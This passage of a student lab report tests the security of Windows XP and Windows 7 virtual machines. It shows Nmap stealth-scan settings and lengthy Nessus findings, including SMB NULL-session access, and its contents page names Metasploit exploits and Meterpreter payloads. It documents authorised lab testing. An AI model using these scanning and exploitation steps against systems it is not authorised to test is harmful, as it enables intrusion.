Enterprise Architecture Testing
Transcript of Enterprise Architecture Testing
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 1/73
V AN TAGE POI N T COM PUTI N G
BEN DAHL
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 2/73
PAGE | 2
CONTENTS
Purpose .............................................................................................................................................................................................................................................. 3
Schedule ............................................................................................................................................................................................................................................ 4
Acquisitions ..................................................................................................................................................................................................................................... 5
Installation ....................................................................................................................................................................................................................................... 6
Patch Management and Configuration ............................................................................................................................................................................... 9
Network Discovery (NMap) ................................................................................................................................................................................................... 12
Network Map .......................................................................................................................................................................................................................... 12
Windows XP ............................................................................................................................................................................................................................ 13
Windows 7 ............................................................................................................................................................................................................................... 14
Vulnerability Scanning (Nessus) ......................................................................................................................................................................................... 15
Windows XP ............................................................................................................................................................................................................................ 15
Windows 7 ............................................................................................................................................................................................................................... 22
Penetration Testing (Metasploit) ........................................................................................................................................................................................ 59 Exploits ...................................................................................................................................................................................................................................... 59
Microsoft Server Service Relative Path Stack Corruption........................................................................................................................... 59
Internet Explorer XML Core Services HTTP Request Handling ............................................................................................................... 60
Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution ...................................................................................... 61
Payloads .................................................................................................................................................................................................................................... 62
Windows Meterpreter (Reflective Injection), Bind TCP Stager ............................................................................................................... 62
Windows Meterpreter (Reflective Injection), Reverse TCP Stager ........................................................................................................ 62
Windows XP ............................................................................................................................................................................................................................ 63
Test 1 .................................................................................................................................................................................................................................... 63
Test 2 .................................................................................................................................................................................................................................... 63
Test 3 .................................................................................................................................................................................................................................... 64
Test 4 .................................................................................................................................................................................................................................... 64
Test 5 .................................................................................................................................................................................................................................... 65
Test 6 .................................................................................................................................................................................................................................... 65
Windows 7 ............................................................................................................................................................................................................................... 67
Test 1 .................................................................................................................................................................................................................................... 67
Test 2 .................................................................................................................................................................................................................................... 67
Test 3 .................................................................................................................................................................................................................................... 68
Test 4 .................................................................................................................................................................................................................................... 68 Test 5 .................................................................................................................................................................................................................................... 69
Test 6 .................................................................................................................................................................................................................................... 71
Conclusion ...................................................................................................................................................................................................................................... 72
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 3/73
PAGE | 3
PURPOSE
Information is the most critical asset in any organization. Proprietary data,
information, and knowledge are just as valuable to a business as tangible assets. As such,
information needs to be suitably protected and secured in a fashion as rigorous as that of
other business assets. This is especially important with the increasing number of
vulnerabilities and threats and the interconnected nature of the business environment.
The Windows Operating Environment is the most common environment in the
corporate world. Currently, Windows XP represents the largest share of the market, but
Windows 7 looms on the horizon. Given a clean installation of the Windows Operating
Environment and physical access to the network, which operating system, Windows XP or
Windows 7, is more secure?
In order to execute this scenario, a lab environment will be created for testing
purposes. The lab will consist of one physical server with VirtualBox and two virtual
machines. One virtual machine will have Windows XP and the other will have Windows 7
(Both acquired through DePaul via the MSDNAA). All tests will be performed with NETLAB
(the physical server) in a manner similar to those used in the Vantage Point Computing
Security Policy.
Evaluation will be done in a manner similar to IS433 and IS533 classes at DePaul. In
concurrence with the following schedule, an infrastructure will be established and verified.
This will be followed by testing with NMAP, Nessus, and Metasploit to determine the
potential vulnerabilities and then test their weaknesses.
Ultimately, the final goal is to verify the security of the two Windows versions.
Windows XP has been tested, patched, and service packed over the course of almost a
decade. Windows 7 has been publicly available for less than a year. Did Microsoft learn
from their mistakes with Windows XP? Are all the vulnerabilities that were patched
throughout the lifecycle of Windows XP still secure, or are they open in Windows 7?
Furthermore, is the upgrade to Windows 7 recommended for enterprise use, or only for
home use? Throughout the course of testing these questions, along with many others will
be answered.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 4/73
PAGE | 4
SCHEDULE
• Week One: Acquisitions
o Acquire two lab machineso Acquire switch and cables
o Acquire Windows XPo Acquire Windows 7
Deliverable: Lab Environment pictures
• Week Two: Installation
o Install Windows 7o Install Windows XPo Verify network connectivity of lab machines
Deliverable: Windows Desktop Screenshots
• Week Three: Patch Management & Configuration
o Install latest Windows 7 patcheso Install latest Windows XP patcheso Verify network connectivity of WHEELJACKo Verify functionality of testing tools on WHEELJACK
Deliverable: netstat –ano screenshots
• Week Four & Five: NMAP
o Execute NMAP scans to map network
Deliverable: NMAP network map
Deliverable: NMAP Report Draft
• Week Six & Seven: Nessus
o Run Nessus scans on Windows XPo Run Nessus scans on Windows 7
Deliverable: Nessus Report Files Deliverable: Nessus Report Draft
• Week Eight & Nine: Metasploit
o Run Metasploit against Windows XPo Run Metasploit against Windows 7
Deliverable: Metasploit console screenshots
Deliverable: Metasploit Report Draft
• Week Ten:
o Final testingo Revisions
Deliverable: Final project report
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 5/73
PAGE | 5
ACQUISITIONS
o Acquire two lab machines
o Acquire switch and cables
o Acquire Windows XP
o Acquire Windows 7
As opposed to acquiring two separate lab machines, and after discussions with James Krev, the
acquisitions assignment was modified to reflect virtualization using Sun VirtualBox. VirtualBox was
installed on a physical server (NETLAB) running Windows XP.
Additionally, Windows XP and Windows 7 were downloaded and installed as separate virtual
instances within VirtualBox.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 6/73
PAGE | 6
INSTALLATION
o Install Windows 7
o Install Windows XP
o Verify network connectivity of lab machines
The following screenshots depict the virtual installations of Windows 7.
Windows7: ipconfig /all – To verify network connectivity and acquisition of an IP address.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 7/73
PAGE | 7
Windows7: netstat – ano – Displays open ports and Process IDs.
The following screenshots depict the virtual installations of Windows XP.
WindowsXP: ipconfig /all – To verify network connectivity and acquisition of an IP address.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 8/73
PAGE | 8
WindowsXP: netstat – ano – Displays open ports and Process IDs.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 9/73
PAGE | 9
PATCH MANAGEMENT AND CONFIGURATION
o Install latest Windows 7 patches
o Install latest Windows XP patches
o Verify network connectivity of NETLAB
o Verify functionality of testing tools on NETLAB
The following screenshot depicts the virtual installations of Windows 7.
Windows7: Windows Update – To verify the operating system is patched to the most recent
version.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 10/73
PAGE | 10
The following screenshot depicts the virtual installations of Windows XP.
WindowsXP: Windows Update – To verify the operating system is patched to the most recent
version.
The following screenshots depict the NETLAB server.
NETLAB: ipconfig/all – To verify network connectivity.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 11/73
PAGE | 11
NETLAB: Tools (Nessus / NMap / Metasploit)
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 12/73
PAGE | 12
NETWORK DISCOVERY (NMAP)
NMap was used to create a complete network topology of the local area network that NETLAB
(including the virtual machines) is part of.
Local Address 192.168.0.166 is the IP address of the Windows XP virtual machine.Local Address 192.168.0.171 is the IP address of the Windows 7 virtual machine.
NMap was used with the following parameters:
-p1-65535 - Used to specify ports 1-65535
-T4 - Used to specify the timing of the scans
-sS - Specifies NMap runs in stealth syn mode.
192.168.0.1/24 - Scans all hosts on the local network to create the map.
192.168.0.166 - Scans the Windows XP virtual machine.
192.168.0.171 - Scans the Windows XP virtual machine.
NETWORK MAP
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 13/73
PAGE | 13
WINDOWS XP
The NMap scan of Windows XP revealed 65535 scanned ports, all of which were filtered.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 14/73
PAGE | 14
WINDOWS 7
The NMap scan of the Windows 7 virtual machine scanned 65535 ports, 7 of which were open.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 15/73
PAGE | 15
VULNERABILITY SCANNING (NESSUS)
WINDOWS XP
192.168.0.166
Scan time :
Start time : Mon Nov 23 14:14:17 2009
End time : Mon Nov 23 14:14:41 2009
Number of vulnerabilities :
Open ports : 5
Low : 8
Medium : 0
High : 0
Information about the remote host :
Operating system : (unknown)
NetBIOS name : WINXP
DNS name : (unknown)
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 16/73
PAGE | 16
Port netbios-ns (137/udp)
Using NetBIOS or SMB to retrieve information from a Windows host
Synopsis :
It is possible to obtain the network name of the remote host.
Description :
The remote host listens on UDP port 137 or TCP port 445 and replies to
NetBIOS nbtscan or SMB requests.
Note that this plugin gathers information to be used in other plugins
but does not itself generate a report.
Solution :
n/a
Risk factor :
None
Plugin output :
The following 6 NetBIOS names have been gathered :
WINXP = Computer name
WORKGROUP = Workgroup / Domain name
WINXP = File Server Service
WORKGROUP = Browser Service Elections
WORKGROUP = Master Browser
__MSBROWSE__ = Master Browser
The remote host has the following MAC address on its adapter :
08:00:27:09:16:8a
Nessus ID : 10150
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 17/73
PAGE | 17
Port microsoft-ds (445/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
A CIFS server is running on this port.
Nessus ID : 11011
SMB NativeLanMan
Synopsis :
It is possible to obtain information about the remote operating
system.
Description :
It is possible to get the remote operating system name and
version (Windows and/or Samba) by sending an authentication
request to port 139 or 445.
Solution :
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 18/73
PAGE | 18
n/a
Risk factor :
None
Plugin output :
The remote Operating System is : Windows 5.1
The remote native lan manager is : Windows 2000 LAN Manager
The remote SMB Domain Name is : WINXP
Nessus ID : 10785
SMB log in
Synopsis :
It is possible to log into the remote host.
Description :
The remote host is running one of the Microsoft Windows operating
systems. It was possible to log into it using one of the following
account :
- NULL session
- Guest account
- Given Credentials
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
n/a
Risk factor :
None
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 19/73
PAGE | 19
Plugin output :
- NULL sessions are enabled on the remote host
CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595BID : 494, 990, 11199
Nessus ID : 10394
SMB LanMan Pipe Server browse listing
Synopsis :
It is possible to obtain network information.
Description :
It was possible to obtain the browse list of the remote Windows system
by send a request to the LANMAN pipe. The browse list is the list of
the nearest Windows systems of the remote host.
Solution :
n/a
Risk factor :
None
Plugin output :
Here is the browse list of the remote host :
WINXP ( os : 5.1 )
Other references : OSVDB:300
Nessus ID : 10397
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 20/73
PAGE | 20
SMB NULL session
Synopsis :
It is possible to log into the remote Windows host with a NULLsession.
Description :
The remote host is running Microsoft Windows, and it was possible to
log into it using a NULL session (ie, with no login or password). An
unauthenticated remote attacker can leverage this issue to get
information about the remote host.
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
n/a
Risk factor :
None
CVE : CVE-2002-1117BID : 494
Nessus ID : 26920
SMB registry can not be accessed by the scanner
Synopsis :
Nessus is not able to access the remote Windows Registry.
Description :
It was not possible to connect to PIPE\winreg on the remote host.
If you intend to use Nessus to perform registry-based checks, the
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 21/73
PAGE | 21
registry checks will not work because the 'Remote Registry Access'
service (winreg) has been disabled on the remote host or can not be
connected to with the supplied credentials.
Solution :
n/a
Risk factor :
None
Nessus ID : 26917
Port epmap (135/tcp)
Port icslap (2869/tcp)
Port netbios-ssn (139/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol,
used to provide shared access to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
An SMB server is running on this port.
Nessus ID : 11011
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 22/73
PAGE | 22
WINDOWS 7
192.168.0.171
Scan time :
Start time : Mon Nov 23 13:52:49 2009
End time : Mon Nov 23 13:53:33 2009
Number of vulnerabilities :
Open ports : 12
Low : 16
Medium : 0
High : 0
Information about the remote host :
Operating system : (unknown)
NetBIOS name : WIN7
DNS name : (unknown)
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 23/73
PAGE | 23
Port unknown (49155/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the
Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible t
connect and bind to each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49155 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
TCP Port : 49155
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Remote RPC serviceTCP Port : 49155
IP : 192.168.0.171
Nessus ID : 10736
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 24/73
PAGE | 24
Port netbios-ns (137/udp)
Using NetBIOS or SMB to retrieve information from a Windows host
Synopsis :
It is possible to obtain the network name of the remote host.
Description :
The remote host listens on UDP port 137 or TCP port 445 and replies to
NetBIOS nbtscan or SMB requests.
Note that this plugin gathers information to be used in other plugins
but does not itself generate a report.
Solution :
n/a
Risk factor :
None
Plugin output :
The following 6 NetBIOS names have been gathered :
WIN7 = Computer name
WORKGROUP = Workgroup / Domain name
WIN7 = File Server Service
WORKGROUP = Browser Service Elections
WORKGROUP = Master Browser
__MSBROWSE__ = Master Browser
The remote host has the following MAC address on its adapter :
08:00:27:ef:92:b3
Nessus ID : 10150
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 25/73
PAGE | 25
Port unknown (49156/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49156 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49156
IP : 192.168.0.171
Nessus ID : 10736
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 26/73
PAGE | 26
Port unknown (49153/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49153 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0
Description : Unknown RPC service
Annotation : Event log TCPIP
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC serviceAnnotation : NRP server endpoint
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 27/73
PAGE | 27
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Remote RPC service
TCP Port : 49153IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Remote RPC service
TCP Port : 49153
IP : 192.168.0.171
Nessus ID : 10736
Port unknown (49154/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 28/73
PAGE | 28
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49154 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC serviceAnnotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 29/73
PAGE | 29
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
TCP Port : 49154
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
TCP Port : 49154IP : 192.168.0.171
Nessus ID : 10736
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 30/73
PAGE | 30
Port unknown (49152/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49152 :
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
TCP Port : 49152
IP : 192.168.0.171
Nessus ID : 10736
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 31/73
PAGE | 31
Port microsoft-ds (445/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
A CIFS server is running on this port.
Nessus ID : 11011
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapperPIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 32/73
PAGE | 32
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available remotely :
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
Named pipe : \PIPE\InitShutdown
Netbios name : \\WIN7
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
Named pipe : \PIPE\InitShutdown
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0
Description : Unknown RPC service
Type : Remote RPC serviceNamed pipe : \pipe\trkwks
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
Named pipe : \pipe\lsass
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Remote RPC service
Named pipe : \PIPE\protected_storage
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 33/73
PAGE | 33
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIsoType : Remote RPC service
Named pipe : \pipe\lsass
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Remote RPC service
Named pipe : \PIPE\protected_storage
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler ServiceWindows process : svchost.exe
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Remote RPC service
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 34/73
PAGE | 34
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC serviceAnnotation : XactSrv service
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC serviceNamed pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 35/73
PAGE | 35
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC serviceAnnotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 36/73
PAGE | 36
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\srvsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
Named pipe : \PIPE\atsvc
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
Named pipe : \PIPE\srvsvcNetbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Remote RPC service
Named pipe : \PIPE\browser
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0
Description : Unknown RPC service
Annotation : Event log TCPIP
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 37/73
PAGE | 37
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Remote RPC serviceNamed pipe : \pipe\eventlog
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
